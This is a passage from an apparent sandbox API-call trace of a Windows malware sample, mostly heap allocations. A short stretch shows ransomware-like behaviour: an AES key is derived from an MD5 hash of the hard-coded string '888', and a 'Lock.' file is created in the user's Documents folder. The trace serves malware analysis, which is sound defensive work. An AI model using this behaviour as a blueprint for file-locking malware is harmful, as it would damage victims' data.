hHeap=0x2af0000) returned 1 [0218.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0218.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0218.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0218.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0218.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0218.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0218.810] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0218.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0218.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0218.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0218.810] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0218.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0218.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0218.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0218.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0218.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0218.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0218.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0218.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0218.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0218.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0218.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0218.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0218.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0218.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0218.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0218.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0218.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0218.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0218.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0218.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0218.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70e0 | out: hHeap=0x2af0000) returned 1 [0218.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0218.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0218.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0218.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0218.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0218.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0218.811] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0218.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0218.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0218.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0218.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0218.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0218.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0218.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0218.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0218.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0218.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0218.812] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0218.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0218.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0218.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0218.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0218.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0218.812] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0218.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0218.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0218.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0218.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0218.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8a8 | out: hHeap=0x2af0000) returned 1 [0218.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0218.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0218.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0218.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0218.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0218.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0218.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0218.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0218.813] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0218.813] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0218.813] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0218.813] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0218.813] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0218.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0218.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f70c0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0218.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0218.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f6f60, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0218.813] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7c660) returned 1 [0218.814] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0218.814] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0218.814] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0218.814] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0218.814] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0218.814] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0218.814] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0218.814] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0218.814] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0218.821] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0218.822] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0218.822] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0218.822] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0218.822] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0218.822] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0218.822] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0218.822] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0218.822] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0218.822] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aabab8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0218.822] CryptCreateHash (in: hProv=0xa7c660, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0218.822] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0218.822] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a72748, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0218.822] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0218.822] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0218.822] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a726a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0218.822] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0218.822] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0218.822] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0218.822] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0218.823] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aabb00, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0218.823] CryptHashData (hHash=0x9e21f8, pbData=0x2a72748, dwDataLen=0x3, dwFlags=0x1) returned 1 [0218.823] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0218.823] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0218.823] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0218.823] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0218.823] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0218.823] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0218.823] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aabb48, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0218.823] CryptDeriveKey (in: hProv=0xa7c660, Algid=0x6601, hBaseData=0x9e21f8, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e2078) returned 1 [0218.823] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0218.823] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0218.823] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0218.823] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0218.823] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f70c0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0218.823] CryptDestroyHash (hHash=0x9e21f8) returned 1 [0218.823] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/My Shapes" (normalized: "c:\\users\\fd1hvy\\documents\\my shapes"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0218.823] GetLastError () returned 0x5 [0218.824] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0218.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0218.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0218.824] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0218.824] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0218.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0218.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0218.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0218.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0218.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0218.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0218.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0218.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0218.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0218.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0218.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0218.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0218.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0218.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0218.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0218.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0218.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0218.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0218.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x3854218 [0218.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0218.825] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents/" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0218.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854218 | out: hHeap=0x2af0000) returned 1 [0218.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0218.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0218.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x3855010 [0218.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0218.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0218.826] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/Lock.My Shapes" (normalized: "c:\\users\\fd1hvy\\documents\\lock.my shapes"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4e0 [0218.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7040 [0218.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0218.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0218.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0218.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0218.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0218.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0218.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0218.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0218.827] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0218.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0218.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0218.827] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0218.827] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0218.827] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0218.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0218.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0218.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0218.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0218.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0218.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0218.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0218.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0218.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0218.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0218.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0218.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0218.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0218.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0218.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0218.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70c0 [0218.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0218.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0218.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0218.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0218.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0218.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 